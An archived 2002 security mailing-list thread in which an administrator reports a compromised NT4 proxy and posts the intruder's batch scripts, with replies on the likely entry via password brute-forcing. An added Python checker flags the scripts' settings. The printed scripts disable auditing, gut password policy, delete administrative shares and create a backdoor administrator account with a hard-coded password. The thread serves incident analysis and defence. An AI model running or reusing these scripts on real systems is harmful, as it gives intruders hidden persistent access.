Security Incidents mailing list archives

RE: Proxy server hit... Any ideas?


From: "darroch royden" <darroch.royden () blueyonder co uk>
Date: Wed, 20 Nov 2002 12:34:27 -0000

A favourite tool is xscan (xfocus.org); among its other options/plugins
you can choose ntpass, which brute-forces bad passwords on the remote
machine. I would imagine, especially since they are removing the hidden
shares, that this is how they penetrated the machine.

Hope this helps.

-----Original Message-----
From: Mike Cain [mailto:mikec () lpinsurance com] 
Sent: 19 November 2002 9:29 PM
To: incidents () securityfocus com
Subject: RE: Proxy server hit... Any ideas?


I was really more looking for suggestions on 'how' the guy got in, and
if it matched any known exploits. First off, I didn't build the box, and
it wasn't my responsibility until about 3 weeks ago. Secondly, I do know
a good bit about hardening a box, so I am in the process of rebuilding
the Proxy to my specs (No FTP is DEFINITELY one of them since this
company doesn't use FTP). 
Thanks for the help though.... such as it was...

Mike Cain


-----Original Message-----
From: Russell Harding [mailto:hardingr () cunap com] 
Sent: Tuesday, November 19, 2002 3:04 PM
To: Mike Cain
Cc: incidents () securityfocus com
Subject: Re: Proxy server hit... Any ideas?

Mike,

  It seems like you've been gotten by one of the many so-called
'hackers' who troll the internet looking for unpatched NT boxen to use
as rogue FTP (music/warez/movie) servers.

  The incidents list sees this sort of post about once a week... "I run
NT, don't know security and got hit...what did I get?"

  I could be just another person to direct you to the same sources the
list always does (netstat, fport, etc.), but I would like to recommend
the following:

  With an unknown backdoor installed on your system, you really can
never know if you've eradicated the intruder.  It is best to not really
worry about what is there (keep the 'pirates' booty' if you wish :) ),
but focus on what to do about it.  You need to re-format your drive,
start from scratch with the machine _off_ the public internet until it
is fully patched.  Don't always trust Windows Update to keep you
patched... It may help you to use a third-party utility.

   Good luck rebuilding your system,
         -Russell


On Mon, 18 Nov 2002, Mike Cain wrote:

Well, I have had my first run-in with a hacker, or was it a virus? I'm
not 100% sure.. Guess I should start from the beginning...

A few days ago, I began to get user complaints on the slowness of the
internet. I figured it was mostly them just wanting something to
complain about, so I did what all crappy admins do, I ignored it. Well,
last night the box was rebooted after some software was updated. Today
people were complaining about how PAINFULLY slow the internet was, so I
looked at the proxy server. NT4 running proxy3. I know, there is newer,
better stuff, but it's what I have to work with. :) SO... I looked at
the processes and noticed the CPU hovering at 35-50%.. Way too high. So
a quick look at the process list showed two things that I didn't
remember needing to be there, win.exe and start.exe. Next move was to
find them, and they were in the winnt\system\ folder. What I also found
odd was that there were three new folders in that directory, all
created on the 8th: NT, tools, and win.

Here are the contents, respectively.
1. 1fg.dll, 1gno32.dll, 1s.dll, 1t.exe (antivirus sees this one as a
backdoor Trojan), 132.dll, 1gn32.dll, 1idv32.dll, 1sf32.dll,
1ygwin1.dll (says it's a Cygwin POSIX Emulation DLL), 132.dll.bkup

2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in,
srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility
Routine), and _zoLibr.dll

3. (folder) FL, cygwin.dll, MS.dll, secure.bat (see below), temp,
x32.dll, cfg.dll, IGNo32.dll, secure1.bat (see below), pidv32.dll,
win.exe, x32.dll.bkup

SO, anyone know what I have or what hit me? From looking at the secure
and secure1 batch files, it looks like a root kit... But I'm new at
this side of security (I'm a Cisco guy...)

Last thing, the logs show that the attacker was hitting the
\scripts\sample\ folder... Meaning I think he was trying to use the old
IIS Sample Scripts to execute local code... Not sure if he was
successful...

Thanks in advance!!

Mike Cain
CCNP/MCSE


Secure.bat =
@echo off
del temp
echo Compiling New Security Policy ...
echo [Version] >> temp
echo signature="$CHICAGO$" >> temp
echo Revision=1 >> temp
echo [Profile Description] >> temp
echo Description=Default Security Settings. (Windows 2000 Professional) >> temp
echo [System Access] >> temp
echo MinimumPasswordAge = 0 >> temp
echo MaximumPasswordAge = 42 >> temp
echo MinimumPasswordLength = 0 >> temp
echo PasswordComplexity = 0 >> temp
echo PasswordHistorySize = 0 >> temp
echo LockoutBadCount = 0 >> temp
echo RequireLogonToChangePassword = 0 >> temp
echo ClearTextPassword = 0 >> temp
echo [Event Audit] >> temp
echo AuditSystemEvents = 0 >> temp
echo AuditLogonEvents = 0 >> temp
echo AuditObjectAccess = 0 >> temp
echo AuditPrivilegeUse = 0 >> temp
echo AuditPolicyChange = 0 >> temp
echo AuditAccountManage = 0 >> temp
echo AuditProcessTracking = 0 >> temp
echo AuditDSAccess = 0 >> temp
echo AuditAccountLogon = 0 >> temp
echo [Registry Values] >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15 >> temp
echo machine\system\currentcontrolset\control\session manager\protectionmode=4,1 >> temp
echo machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0 >> temp
echo machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0 >> temp
echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp
echo [Privilege Rights] >> temp
echo seassignprimarytokenprivilege = >> temp
echo seauditprivilege = >> temp
echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sebatchlogonright = >> temp
echo sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp
echo secreatepagefileprivilege = *S-1-5-32-544 >> temp
echo secreatepermanentprivilege = >> temp
echo secreatetokenprivilege = >> temp
echo sedebugprivilege = *S-1-5-32-544 >> temp
echo sedenybatchlogonright = >> temp
echo sedenyinteractivelogonright = >> temp
echo sedenynetworklogonright = >> temp
echo sedenyservicelogonright = >> temp
echo seenabledelegationprivilege = >> temp
echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
echo seincreasequotaprivilege = *S-1-5-32-544 >> temp
echo seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501 >> temp
echo seloaddriverprivilege = *S-1-5-32-544 >> temp
echo selockmemoryprivilege = >> temp
echo semachineaccountprivilege = >> temp
echo senetworklogonright = %1 >> temp
echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp
echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sesecurityprivilege = *S-1-5-32-544 >> temp
echo seservicelogonright = >> temp
echo seshutdownprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo sesyncagentprivilege = >> temp
echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo setakeownershipprivilege = *S-1-5-32-544 >> temp
echo setcbprivilege = >> temp
echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo Adding User %1 with the Password %2 ...
net user /add slash 971985
echo Adding slash to the Local Administrator Group ...
net localgroup administrators slash /add
echo Loading New Security Policy ...
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp
echo System is now secure.



Secure1.bat

net share /delete C$ /y > net.deld
net share /delete D$ /y >> net.deld
net share /delete E$ /y >> net.deld
net share /delete F$ /y >> net.deld
net share /delete G$ /y >> net.deld
net share /delete H$ /y >> net.deld
net share /delete I$ /y >> net.deld
net share /delete J$ /y >> net.deld
net share /delete K$ /y >> net.deld
net share /delete L$ /y >> net.deld
net share /delete M$ /y >> net.deld
net share /delete N$ /y >> net.deld
net share /delete O$ /y >> net.deld
net share /delete P$ /y >> net.deld
net share /delete Q$ /y >> net.deld
net share /delete R$ /y >> net.deld
net share /delete S$ /y >> net.deld
net share /delete T$ /y >> net.deld
net share /delete U$ /y >> net.deld
net share /delete V$ /y >> net.deld
net share /delete W$ /y >> net.deld
net share /delete X$ /y >> net.deld
net share /delete Y$ /y >> net.deld
net share /delete Z$ /y >> net.deld
net share /delete ADMIN$ /y >> net.deld
#net share /delete IPC$ /y >> net.deld
del net.deld
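An added defender-side check, not part of this thread or any poster's code: it parses a secedit-style template like the one secure.bat above writes out and flags the settings that disable auditing, zero the password policy, drop LSA hardening or take a privilege right from a script argument. The sample template is constructed here to mirror the posted script, and the function names are assumptions of this example.

```python
# Constructed sample mirroring the template that secure.bat writes to "temp"
SAMPLE_INF = """[System Access]
MinimumPasswordLength = 0
PasswordComplexity = 0
LockoutBadCount = 0
[Event Audit]
AuditLogonEvents = 0
AuditAccountLogon = 0
[Registry Values]
machine\\system\\currentcontrolset\\control\\lsa\\restrictanonymous=4,0
machine\\system\\currentcontrolset\\control\\lsa\\lmcompatibilitylevel=4,0
[Privilege Rights]
senetworklogonright = %1
sedebugprivilege = *S-1-5-32-544
"""

def parse_inf(text):
    """Parse [section] / key=value lines into {section: {lowercased key: value}}."""
    sections, current = {}, None
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif current is not None and "=" in line and not line.startswith(";"):
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections

PASSWORD_KEYS = ("minimumpasswordlength", "passwordcomplexity", "lockoutbadcount")
LSA_KEYS = ("restrictanonymous", "lmcompatibilitylevel")

def find_weakenings(inf_text):
    """List settings that disable auditing, gut password policy or drop LSA hardening."""
    inf, findings = parse_inf(inf_text), []
    for key, value in inf.get("Event Audit", {}).items():
        if value == "0":
            findings.append(f"audit disabled: {key}")
    for key, value in inf.get("System Access", {}).items():
        if key in PASSWORD_KEYS and value == "0":
            findings.append(f"password policy weakened: {key}=0")
    for key, value in inf.get("Registry Values", {}).items():
        leaf = key.rsplit("\\", 1)[-1]   # value name after the last backslash
        if leaf in LSA_KEYS and value.endswith(",0"):   # "4,0" is REG_DWORD 0
            findings.append(f"LSA hardening removed: {leaf}={value}")
    for key, value in inf.get("Privilege Rights", {}).items():
        if "%" in value:   # a batch argument is substituted into the right at run time
            findings.append(f"right set from script argument: {key}={value}")
    return findings
```

Run against a template pulled from a suspect box, a non-empty result is the cue to treat the host as compromised rather than merely misconfigured, which is the rebuild advice given earlier in the thread.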




----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For
more information on this free incident handling, management and
tracking system please see: http://aris.securityfocus.com




